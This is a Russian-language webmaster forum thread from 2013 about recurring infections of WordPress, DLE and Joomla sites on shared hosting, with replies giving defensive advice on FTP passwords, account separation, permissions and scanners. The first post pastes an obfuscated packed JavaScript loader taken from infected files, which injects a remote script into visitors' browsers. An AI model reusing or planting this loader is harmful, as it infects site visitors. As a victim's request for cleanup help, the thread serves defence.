АРМАДА
Где и как позакрывать дыры от вирусов на хостинге?
Новая тема Написать ответ Advanced Hosters - профессиональный хостинг

Талян + + +
Banned
Зарегистрирован: 14.01.2008
Сообщений: 715
Обратиться по нику
# Добавлено:Сб Ноя 30, 2013 10:44 amДобавить в избранноеОтветить с цитатой
Периодически на хостинге заражаются практически все сайты, смс: вп, дле, джумла.
Предполагаю, что очень серьезного на сайтах ничего нет, так как вебмастера Я и Г уже бы написали.
Сидит какая-то хрень, я все удалю, а оно снова в сайты гадню подсаживает.
вот скрин, что было:
[url="http://clip2net.com/s/6gg098"] [/url]

Все файлы имеют расширение js.
Во всех одинаковое содержание:
Код:
eval(function(p,a,c,k,e,d){e=function(c){return(c<a?'':e(parseInt(c/a)))+((c=c%a)>35?String.fromCha­rCode(c+29):c.toString(36))};if(!''.replace(/^/,String)){while(c--){d[e(c)]=k[c]||e(c)}k=[f­unction(e){return d[e]}];e=function(){return'\\w+'};c=1};while(c--){if(k[c]){p=p.replace(new RegExp('\\b'+e(c)+'\\b','g'),k[c])}}return p}('d A(l){H(e.t&&e.G){5 s=e.G(\'1g\')[0];5 f=e.t(\'1h\');f.p(\'1i\',\'1j/1f\');f.p(\'l\',l);5 1e="=1a[<}8~j;%%]";5 1b="&4; y}[={4]";5 1c="1d/1k$#k]1l~z{1s:1t";5 19="%#1v=1r+3:%>1q";5 1m="X(^~1n{[1o@1p&1w-{W[";s.R(f)}}d E(){m x.O()}5 T="}0@U;N`)I)*]%$J";5 M="6]2(P}7-18=.h 14";5 15="b`~+2*u?+16@";5 17="13$12[Y$+";5 V="*Z=.q`10{11";d v(c){m c.r(o)!=-1}5 1u="4,*@`n+S[/*25";5 1x="C^1X?K * L";5 1W="9]+;20+*{*>$+)*21-1Z";5 1Y="[w=23;$22";5 27="26($24]2[i?.>}!a}";5 B="1U://1E.1F.c/1G";5 o="o";5 1H="1V]6:1D}!1C";5 1y="1z(}0}#@g`0[1A%1B*b";5 1I="4]%?1J^`~1Q<~4&4[1R*Q ";5 1S="1T(1P";5 1O="+~,& 1K!3`!(Q*/";d D(c){m c.r("1L")==-1}d F(){5 c=x.1M.1N();H(D(c)&&v(c)&&E()){A(B)}}F();',62,132,'|||||var|||||||ua|function|document|s­cript_tag||||||src|return||win|setAttri
bute||indexOf|head_tag|createElement||isWin||navigator|||includeJavascript|url||n
otChrome|cond3|includeCounter|getElementsByTagName|if|oJTM7|pr|||bDyWnY1|UxJ|java
Enabled|xX||appendChild||bDyWnY0|tk|bDyWnY4|||abX|o5|RJ|Zme_|Pg|311|0Xf|bDyWnY2|u
6|bDyWnY3|rX|eqCaxYl3|O0BnA|eqCaxYl1|eqCaxYl2|81|eqCaxYl0|javascript|head|script|
type|text|Tm|l2|eqCaxYl4|6Z0a1|0p|bEc|MhW|KR6|uS|kS|BzqqE0|33|F9|BzqqE1|DtqGo1|7K
|rVDlg|6P|zi8|k4ld2|exaxad|pp|b23e441d405961897c09b2c9c9a2cdfcb23e441d405961897c0
9b2c9c9a2cdfcb23e441d405961897c09b2c9c9a2c|DtqGo0|DtqGo2|w6l|N3|chrome|userAgent|
toLowerCase|DtqGo4|OP|lE|QS|DtqGo3|tj4o0kk2|http|CX0|BzqqE2|5W|BzqqE3|5IG|Ct|92|6
Gr|x9YO|Ia8|57P|UtVM|BzqqE4'.split('|'),0,{}))


Coooler
V.I.P.
Зарегистрирован: 21.06.2010
Сообщений: 4368
Обратиться по нику
# Добавлено:Вс Dec 01, 2013 11:56 amОтветить с цитатой
Талян, это хостинг из твоей предыдущей темы? Если он такое проблемный, то его проще сменить.

exolon
V.I.P.
Зарегистрирован: 22.11.2007
Сообщений: 2397
Обратиться по нику
# Добавлено:Пн Dec 02, 2013 10:56 amОтветить с цитатой
Отказаться от использования WP, DLE, Joomla.

Странник
V.I.P.
Зарегистрирован: 28.06.2010
Сообщений: 4617
Обратиться по нику
# Добавлено:Вт Dec 03, 2013 3:04 pmОтветить с цитатой
Попробуй проверить сайты с помощью этого скрипта AI-Bolit

Saytik
Опытный
Зарегистрирован: 29.09.2010
Сообщений: 189
Обратиться по нику
# Добавлено:Ср Dec 04, 2013 3:05 pmОтветить с цитатой
1. Если у вас сохранен в FTP менеджере пароль - это может быть причиной, смените сразу пароли на FTP и не сохраняйте в FTP менеджерах
2. Если все сайты находятся под одним FTP пользователем в одном аккаунте - нужно разносить под разные. Так как через уязвимость в одном сайте заливают php-шелы в другие и все дружно стают дырявыми ...

Это два главных условия выполнить как минимум, дальше уже смотреть какой сайт ломают и смотреть логи через что ломают ...
У меня клиент жаловался что постоянно ломают все сайты. Разнесли по разным аккаунтам сайты - стали ломать только один джумловский, а во все остальные уже через него добавляли php-шелы когда было под одним пользователем все ...
http://Goodhoster.NET - Профессиональный надежный хостинг! (Украина, Германия)
Хостинг | ВПС | Серверы | Домены

Kamilla
Гуру
Зарегистрирован: 09.07.2013
Сообщений: 1315
Обратиться по нику
# Добавлено:Чт Dec 05, 2013 10:06 amОтветить с цитатой
Цитата:
стали ломать только один джумловский,


Такая дырявая CMS?

Saytik
Опытный
Зарегистрирован: 29.09.2010
Сообщений: 189
Обратиться по нику
# Добавлено:Ср Dec 11, 2013 2:54 pmОтветить с цитатой
не ЦМС дырявая, обычно ломают через уязвимости в плагинах, компонентах, шаблонах дырявых ...
http://Goodhoster.NET - Профессиональный надежный хостинг! (Украина, Германия)
Хостинг | ВПС | Серверы | Домены

HeavyHell
Опытный
Зарегистрирован: 10.09.2010
Сообщений: 240
Обратиться по нику
# Добавлено:Ср Dec 11, 2013 4:50 pmОтветить с цитатой
r5 заплатить спецу один раз за проверку всего - не?
а то на моей памяти был один хост - так я со своего ака свободно ходил по всему серву

Saytik
Опытный
Зарегистрирован: 29.09.2010
Сообщений: 189
Обратиться по нику
# Добавлено:Ср Dec 11, 2013 5:09 pmОтветить с цитатой
Цитата:
так я со своего ака свободно ходил по всему серву


ходить по серву не всегда значит что у вас есть права на запись в файлы... Также, иногда пользователи могут сами любители поставить права полные 777 на папку с сайтом что и другие могут читать вместо 750 которые по умолчанию ...
http://Goodhoster.NET - Профессиональный надежный хостинг! (Украина, Германия)
Хостинг | ВПС | Серверы | Домены

HeavyHell
Опытный
Зарегистрирован: 10.09.2010
Сообщений: 240
Обратиться по нику
# Добавлено:Ср Dec 11, 2013 6:44 pmОтветить с цитатой
боюсь растроить, но имея в виду ходил - значит
1 - имел доступ к базам (логины пасы то в конфигах были)
2 - да, я мог коректировать страницы чужих сайтов

Tomas-R + +
V.I.P.
Зарегистрирован: 07.01.2008
Сообщений: 5567
Обратиться по нику
# Добавлено:Вс Dec 15, 2013 11:56 pmОтветить с цитатой
1 фришные схемы к CMS полны дыр
2 проблемный хост

решение менять хост где все порешают
рекламная подпись (в PM)

Руслан777 + + + +
Banned
Зарегистрирован: 06.02.2012
Сообщений: 36
Обратиться по нику
# Добавлено:Пн Dec 16, 2013 2:31 amОтветить с цитатой
Прежде всего выбрать надежный движок и хостинг-компанию с защитой от dDos-атак и проверкой на вирусы. Я например пользуюсь достаточно хорошим хостом от рег.ру А дыры лотаются через php-скрипт.
Новая тема Написать ответ    ГЛАВНАЯ ~ ТЕХНИЧЕСКИЕ ВОПРОСЫ

Перейти:  





Генеральный спонсор



Партнеры